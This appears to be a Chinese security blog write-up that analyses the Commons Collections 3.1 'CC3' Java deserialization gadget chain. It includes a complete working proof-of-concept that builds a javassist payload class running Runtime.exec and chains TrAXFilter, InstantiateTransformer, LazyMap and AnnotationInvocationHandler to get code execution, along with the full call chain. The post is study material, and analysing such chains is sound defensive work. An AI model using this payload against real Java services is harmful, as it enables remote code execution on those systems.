Commons Collections 3

序言

环境配置还是与CC1一样:java环境:1.7 , commons-collections: 3.1

如果说CC1是从AnnotationInvocationHandler的readOject入手,利用Map(proxy).entrySet()触发TransformedMap->checkSetValue(),进而调用ChainedTransformer->transform(),CC2是利用InvokerTransformer.transform()调用newTransformer加载字节码RCE的话,那么CC3就像是CC1CC2二者的结合

前置知识

InstantiateTransformer

org.apache.commons.collections.functors.InstantiateTransformer

img

其transform方法:

image-20210729195909769

注意这里最终返回的是一个对象的初始化,并且其中参数都可控,看到这个实例化,有没有一丝丝CC2加载字节码的感觉。

TrAXFilter

com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter

image-20210729195956537

_transformer = (TransformerImpl) templates.newTransformer();

看到这个newTransformer()是不是更像CC2了,CC2是用InvokerTransformer来反射触发TemplatesImpl.newTransformer(),最后触发_class.newInstance()实例化加载字节码触发RCE。

而这里的TrAXFilter可以代替InvokerTransformer调用newTransformer(),上面的InstantiateTransformer再来充当实例化TrAXFilter的角色。

POC分析

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
package CC3;

import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter;
import javassist.*;
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InstantiateTransformer;
import org.apache.commons.collections.map.LazyMap;
import javax.xml.transform.Templates;
import java.io.*;
import java.lang.reflect.*;
import java.util.HashMap;
import java.util.Map;

public class test {
    public static void main(String[] args) throws Exception{
        //javassist 生成字节码
        ClassPool pool=ClassPool.getDefault();
        pool.insertClassPath(new ClassClassPath(AbstractTranslet.class));
        CtClass test=pool.makeClass("EvilTeabo");
        String name="EvilTeabo";
        test.setName(name);
        String cmd="java.lang.Runtime.getRuntime().exec(\"calc.exe\");";
        //System.out.println(pool.get(AbstractTranslet.class.getName()));
        test.setSuperclass(pool.get(AbstractTranslet.class.getName()));
        CtConstructor cst=test.makeClassInitializer();
        cst.insertBefore(cmd);
        test.writeFile("./");

        byte[] bytes= test.toBytecode();

        //TemplatesImpl 加载字节码
        TemplatesImpl templates=TemplatesImpl.class.newInstance();
        Class temp=Class.forName("com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl");

        //先挨个设置反射时候内部链所需的值
        Field _name=temp.getDeclaredField("_name");
        _name.setAccessible(true);
        _name.set(templates,"Teabo");  //_name满足非空

        Field _bytecodes = temp.getDeclaredField("_bytecodes");
        _bytecodes.setAccessible(true);
        _bytecodes.set(templates,new byte[][]{bytes}); // _bytecodes赋值一个javassist得到的Byte数组

        //构造chainedTransformer,用TrAXFilter调用InstantiateTransformer的newIntance()
        Transformer[] chain=new Transformer[]{
                new ConstantTransformer(TrAXFilter.class),
                new InstantiateTransformer(new Class[]{Templates.class},new Object[]{templates})
        };
        ChainedTransformer chainedTransformer=new ChainedTransformer(chain);

        //设置LazyMap对象的factory属性为chainedTransformer链
        Map map=new HashMap();
        Map lazymap= LazyMap.decorate(map,chainedTransformer);

        //以下为cc1部分AnnotationInvocationHandler
        Class cl = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
        Constructor ctor = cl.getDeclaredConstructor(Class.class, Map.class);
        ctor.setAccessible(true);

        //获取AnnotationInvocationHandler类实例,并传入transformedMap
        InvocationHandler invocationHandler=(InvocationHandler)ctor.newInstance(Override.class,lazymap);
        Map map1=(Map) Proxy.newProxyInstance(LazyMap.class.getClassLoader(),LazyMap.class.getInterfaces(),invocationHandler);
        Object object=ctor.newInstance(Override.class,map1);

        //序列化
        ObjectOutputStream outputStream = new ObjectOutputStream(new FileOutputStream("./evilCC3.bin"));
        outputStream.writeObject(object);
        outputStream.close();
        //反序列化
        ObjectInputStream inputStream = new ObjectInputStream(new FileInputStream("./evilCC3.bin"));
        inputStream.readObject();

    }
}

利用链:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
ObjectInputStream.readObject()
           AnnotationInvocationHandler.readObject()
               Map(Proxy).entrySet()
                   AnnotationInvocationHandler.invoke()
                       LazyMap.get()
                           ChainedTransformer.transform()
                           ConstantTransformer.transform()
                           InstantiateTransformer.transform()
                           newInstance()
                               TrAXFilter#TrAXFilter()
                               TemplatesImpl.newTransformer()
                                        TemplatesImpl.getTransletInstance()
                                        TemplatesImpl.defineTransletClasses
                                        newInstance()
                                           Runtime.exec()

前半段生成字节码文件和设置TemplatesImpl的值与CC2一模一样。可以参考CC2。

image-20210729200319783

但是接下来和CC2有不同的地方,CC2是用ComparatorTransformer来调用InvokerTransformer.transform()去触发TemplatesImpl.newTransform(),进而实例化字节码文件。而根据前置知识的了解可以知道,这里还能用InstantiateTransformer对象去实例化TrAXFilter,在里面触发newTransform()实例化。

所以这里这样构造:

image-20210729200415788

而接下来如何触发ChainedTransformer.transform()的方法也是CC1中接触过的,那就是Lazymap

image-20210729200442460

在CC1中分析过,可以知道LazyMap.get()可以触发transform方法

image-20210729200514619

而接下来readObject()入口依然采用CC1中的AnnotationInvocationHandler

看着有点迷,来分析一下。

首先反射创建了一个AnnotationInvocationHandler对象,实例化的时候传入了Target.classlazymap

(传入Target.class的原因cc2中也讲过,因为这是一个处理注解的类,构造方法的第一个参数是Annotation类型参数。)

而下面是一个动态代理,传递三个参数ClassLoader,要代理的接口数组和调用接口时触发的参数(这里就是实例化过后的AnnotationInvocationHandler)。

当调用代理对象的任意方法时,就会触发代理类的invoke方法。这里就是AnnotationInvocationHandlerinvoke方法,而在他的invoke()里就会调用到get方法。

命令执行过程

在readObject()中,由于被代理lazymap对象调用了entrySet方法,所以就调用了AnnotationInvocationHandlerinvoke方法.

image-20210729200822597

调用LazyMap的get()

image-20210729200831643

触发ChianedTransformer.transform()

image-20210729200846459

这里将第一次返回的TrAXFilter.class作为InstantiateTransformer的input输入,iArgs为包含恶意_bytecodesTemplatesImpl对象,iParamTypes为对应构造函数类型的Templates.class

con.newInstance(iArgs)实例化TrAXFilter

在TrAXFilter的构造函数中,调用Templates.newTransformer()

image-20210729201126632

接下来的步骤也是与CC2中的一样,从newTransformer()开始,经过处理后将字节码还原成类,并最终实例化触发static中代码块

image-20210729201146030

newInstance()实例化的时候就会执行静态代码块中的内容。

image-20210729201159698

image-20210729201419416

结尾

调过CC1和CC2的利用链之后再来看CC3,明显感觉简单了很多,前半部分用的CC2的代码,包括字节码生成,TemplatesImpl构造,后半部分就是用的CC1中的内容了。

在分析CC3的时候也是在温习CC1和CC2,发现有些东西的理解更加深刻了,对java反序列化以及开始有一丝丝“灵性”了。

本站总访问量 |

tag:

    缺失模块。
    1、请确保node版本大于6.2
    2、在博客根目录(注意不是yilia根目录)执行以下命令:
    npm i hexo-generator-json-content --save

    3、在根目录_config.yml里添加配置: 

      jsonContent:
    meta: false
    pages: false
    posts:
      title: true
      date: true
      path: true
      text: false
      raw: false
      content: false
      slug: false
      updated: false
      comments: false
      link: false
      permalink: false
      excerpt: false
      categories: false
      tags: true

摸爬滚打学习的web菜狗